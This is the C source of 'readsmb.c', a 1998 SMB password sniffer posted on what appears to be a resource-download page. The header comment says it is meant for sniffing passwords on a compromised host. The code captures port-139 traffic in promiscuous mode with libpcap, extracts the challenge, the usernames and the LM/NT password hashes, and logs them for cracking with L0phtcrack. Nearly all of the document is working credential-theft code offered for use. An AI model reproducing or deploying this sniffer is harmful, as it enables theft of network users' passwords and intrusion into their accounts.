资源名称 [点击查看]
- /* Fear the swimming Elephant! */
- /* readsmb.c v0.56
- * by the basement research <> 5/29/98
- *
- * Many thanks to L0pht Heavy Industries - without L0phtcrack this is worthless.
- *
- * An implementation of the SMB sniffer that comes with l0phtcrack 2.0. The
- * purpose here is to provide an effective means of sniffing SMB passwords on
- * a compromised host. Its too hard to execute a sniffer on a remote host with
- * only an NT version available.
- *
- * If you don't have libpcap, you'll need to get it - its at
- * (Has there ever been a more useful government service than this?)
- * Tested on Linux 2.0.x (glibc1 and 2), and FreeBSD. It will compile on
- * Slow-aris, but it is totally untested (there will be a byte-ordering issue).
- *
- * This is pretty crude but functional. I still don't even know what the second
- * field of the sniff file is for (the program simply inserts a '3'). I tested
- * this with Win95, WinNT, and Samba clients (both smbclient LANMAN2 and NT1).
- * I don't think it grabs the correct string for Administrator, because LC
- * couldn't crack it (sometimes the real readsmb didn't seem to get it either
- * - and sometimes it seemed to drop the username. readsmb also didn't seem
- * to always work for LANMAN2 protocol, this does).
- *
- * The start_pcap() function was taken from "UNIX Network Programming -
- * Networking APIs : Sockets and XTI" by Richard Stevens (great book.)
- *
- * Officially dedicated to Nikki Steele.
- *
- * Fbhepr pbqr vf fcrrpu!
- * jose chung
- * the basement research
- *
- * To compile :
- * cc -o readsmb readsmb.c -lpcap
- * Usage :
- * ./readsmb [output file] (otherwise to stdout)
- */
- #include <stdio.h>
- #include <string.h>
- #include <unistd.h>
- #include <sys/signal.h>
- #ifdef __FreeBSD__
- #include <sys/socket.h>
- #endif /* __FreeBSD__ */
- #ifdef __sun /* Solaris 2.x */
- #define u_int32_t uint32_t
- #include <sys/socket.h>
- #endif /* Not FreeBSD, not Solaris. Our default is Linux */
- #include <net/if.h>
- #include "pcap.h"
- #define FILTER_CMD "src port 139 or dst port 139"
- #define TRUE (1)
- #define LM_PROT 0x0D
- #define NT_PROT 0x11
- #define SMB_SK_COMMAND 0x72
- #define SMB_PW_COMMAND 0x73
- #define TIMEOUT_VALUE 500
- #define PW_OFFSET_NT12 105
- #define PWNT_OFFSET_NT12 129
- #define SK_OFFSET_NT12 112
- #define USER_OFFSET_NT12 129
- #define PWNT_OFFSET_LM2 75
- #define PW_OFFSET_LM2 99
- #define SK_OFFSET_LM2 104
- #define USER_OFFSET_LM2 123
- #define SMB_PORT 139
- FILE *log = NULL;
- char *device;
- struct pcap_pkthdr hdr;
- pcap_t *pfd; /* File descriptor for pcap */
- u_short link_offset = 0; /* 0 if device = ppp0, 14 if device = eth0 */
- int current_pkt_type = 0;
- int neg_prot, pw_offset, sk_offset, user_offset;
- void *
- killed (int sig)
- {
- fflush (log);
- if (log != NULL)
- fclose (log);
- exit (0);
- }
- char *
- check_pkt (char *pkt)
- {
- static u_short port;
- static u_char cmd;
- char *extracted;
- char *discard = NULL;
- u_short *port_ext;
- if ((extracted = (char *) malloc (sizeof (char))) == NULL)
- {
- puts ("Error allocating memory.");
- exit (0);
- }
- if ((port_ext = (u_short *) malloc (sizeof (u_short))) == NULL)
- {
- puts ("Error allocating memory.");
- exit (0);
- }
- memcpy (extracted, (pkt + 48), sizeof (u_char));
- memcpy (port_ext, (u_short *) (pkt + 20), sizeof (u_short));
- port = ntohs (*((u_short *) port_ext));
- cmd = *((u_char *) extracted);
- if (current_pkt_type == SMB_PW_COMMAND && (((int) cmd == SMB_PW_COMMAND) && (!(port == SMB_PORT))))
- {
- free (extracted);
- free (port_ext);
- return (pkt);
- }
- if (current_pkt_type == SMB_SK_COMMAND && (((int) cmd == SMB_SK_COMMAND) && (port == SMB_PORT)))
- {
- free (extracted);
- free (port_ext);
- return (pkt);
- }
- free (extracted);
- free (port_ext);
- return (discard);
- }
- char *
- grab_pcap ()
- {
- char *pptr = NULL;
- char *checked_pptr;
- while ((pptr = (char *) pcap_next (pfd, &hdr)) == NULL);
- pptr = pptr + link_offset;
- checked_pptr = check_pkt (pptr);
- return (checked_pptr);
- }
- char *
- grabber_loop ()
- {
- char *grabbed_pkt = NULL;
- while (grabbed_pkt == NULL)
- {
- grabbed_pkt = grab_pcap ();
- }
- return (grabbed_pkt);
- }
- void
- start_pcap ()
- {
- char cmd[80];
- int psize, datalink;
- struct bpf_program fcode;
- u_int localnet, netmask;
- char errbuf[PCAP_ERRBUF_SIZE];
- char link[] = "ppp0";
- psize = 300; /* I'm not even sure what this does. Did this come from Stevens too? */
- if ((device = pcap_lookupdev (errbuf)) == NULL)
- {
- printf ("pcap_lookupdev : %sn", errbuf);
- exit (-1);
- }
- if (strcmp (device, link) == 0)
- {
- link_offset = 0;
- }
- else
- link_offset = 14;
- printf ("Selected network device %sn", device);
- if ((pfd = pcap_open_live (device, psize, IFF_PROMISC, TIMEOUT_VALUE, errbuf))
- == NULL)
- {
- printf ("pcap_open_live : %sn", errbuf);
- exit (-1);
- }
- puts ("Opened device successfully.");
- if (pcap_lookupnet (device, &localnet, &netmask, errbuf) < 0)
- {
- printf ("pcap_lookupnet : %sn", errbuf);
- exit (-1);
- }
- snprintf (cmd, sizeof (cmd), FILTER_CMD);
- printf ("Applying filter : %sn", &cmd);
- if (pcap_compile (pfd, &fcode, cmd, IFF_PROMISC, netmask) < 0)
- {
- printf ("pcap_compile : %sn", pcap_geterr (pfd));
- exit (-1);
- }
- if (pcap_setfilter (pfd, &fcode) < 0)
- {
- printf ("pcap_setfilter : %sn", pcap_geterr (pfd));
- exit (-1);
- }
- if ((datalink = pcap_datalink (pfd)) < 0)
- {
- printf ("pcap_datalink : %sn", pcap_geterr (pfd));
- exit (-1);
- }
- printf ("The datalink is type %dn", datalink);
- }
- char *
- byte_convert_sk (char *pkt)
- {
- char *pc1, *pc2, *pc3;
- u_long num1, num2, num3;
- char *converted;
- pc1 = (char *) malloc (sizeof (int));
- pc2 = (char *) malloc (sizeof (int));
- pc3 = (char *) malloc (sizeof (int));
- converted = (char *) malloc (17);
- bzero (converted, 17);
- neg_prot = get_prot (pkt); /* This doesn't belong here. */
- if (neg_prot == LM_PROT)
- {
- pw_offset = PW_OFFSET_LM2;
- sk_offset = SK_OFFSET_LM2;
- user_offset = USER_OFFSET_LM2;
- }
- if (neg_prot == NT_PROT)
- {
- pw_offset = PW_OFFSET_NT12;
- sk_offset = SK_OFFSET_NT12;
- user_offset = USER_OFFSET_NT12;
- }
- memcpy (pc1, (pkt + sk_offset), sizeof (int));
- memcpy (pc2, (pkt + (sk_offset + 4)), sizeof (int));
- memcpy (pc3, (pkt + (sk_offset + 8)), sizeof (int));
- num1 = ntohl (*((u_long *) pc1));
- num2 = ntohl (*((u_long *) pc2));
- num3 = (u_long) ntohl (*((u_long *) pc3));
- num1 = (num1 << 8) >> 8;
- num3 = num3 >> 24;
- sprintf (converted, "%.6x%.8x%.2x", num1, num2, num3);
- free (pc1);
- free (pc2);
- free (pc3);
- return (converted);
- }
- int
- get_prot (char *pkt)
- {
- u_char *prot_code;
- int code = 0;
- prot_code = (u_char *) malloc (sizeof (u_char));
- memcpy (prot_code, (pkt + 76), 1);
- code = (int) *prot_code;
- return (code);
- }
- char *
- byte_convert_user (char *pkt)
- {
- char *pc1;
- pc1 = (char *) malloc (49);
- bzero (pc1, 49);
- strcpy (pc1, (pkt + user_offset));
- return (pc1);
- }
- char *
- byte_convert_pw (char *pkt, int run)
- {
- char *lmhash;
- char *pc1, *pc2, *pc3, *pc4, *pc5, *pc6;
- u_int num1, num2, num3, num4, num5, num6;
- lmhash = (char *) malloc (49);
- bzero (lmhash, 49);
- if ((run == 2) && (neg_prot == NT_PROT))
- {
- pw_offset = PWNT_OFFSET_NT12;
- }
- if ((run == 2) && (neg_prot == LM_PROT))
- {
- pw_offset = PWNT_OFFSET_LM2;
- }
- pc1 = (char *) malloc (sizeof (u_int));
- pc2 = (char *) malloc (sizeof (u_int));
- pc3 = (char *) malloc (sizeof (u_int));
- pc4 = (char *) malloc (sizeof (u_int));
- pc5 = (char *) malloc (sizeof (u_int));
- pc6 = (char *) malloc (sizeof (u_int));
- memcpy (pc1, (pkt + pw_offset), 4);
- memcpy (pc2, (pkt + (pw_offset + 4)), 4);
- memcpy (pc3, (pkt + (pw_offset + 8)), 4);
- memcpy (pc4, (pkt + (pw_offset + 12)), 4);
- memcpy (pc5, (pkt + (pw_offset + 16)), 4);
- memcpy (pc6, (pkt + (pw_offset + 20)), 4);
- num1 = ntohl (*((u_int *) pc1));
- num2 = ntohl (*((u_int *) pc2));
- num3 = ntohl (*((u_int *) pc3));
- num4 = ntohl (*((u_int *) pc4));
- num5 = ntohl (*((u_int *) pc5));
- num6 = ntohl (*((u_int *) pc6));
- sprintf (lmhash, "%.8x%.8x%.8x%.8x%.8x%.8x", num1, num2, num3, num4, num5, num6);
- free (pc1);
- free (pc2);
- free (pc3);
- free (pc4);
- free (pc5);
- free (pc6);
- return (lmhash);
- }
- void
- main (int argc, char **argv)
- {
- char *cur_pkt, *next_pkt;
- char *sk, *user, *pw, *ntpw, *output;
- signal (SIGINT, killed);
- signal (SIGTERM, killed);
- signal (SIGKILL, killed);
- signal (SIGQUIT, killed);
- if (argc > 2)
- {
- printf ("Usage : %s [output file]n", *argv);
- exit (0);
- }
- if (argc == 1)
- {
- log = stdout;
- }
- else
- log = fopen (argv[1], "w");
- if ((argc == 2) && (!log))
- {
- puts ("Error opening logfile.");
- exit (0);
- }
- start_pcap ();
- while TRUE
- {
- output = (char *) malloc (172);
- bzero (output, 172);
- current_pkt_type = SMB_SK_COMMAND;
- cur_pkt = grabber_loop ();
- sk = byte_convert_sk (cur_pkt);
- current_pkt_type = SMB_PW_COMMAND;
- next_pkt = grabber_loop ();
- user = byte_convert_user (next_pkt);
- pw = byte_convert_pw (next_pkt, 1);
- ntpw = byte_convert_pw (next_pkt, 2);
- strcat (output, user);
- strncat (output, ":3:", 3);
- strcat (output, sk);
- strncat (output, ":", 1);
- strcat (output, pw);
- strncat (output, ":", 1);
- strcat (output, ntpw);
- fprintf (log, "%#sn", output);
- fflush (log);
- free (output);
- }
- }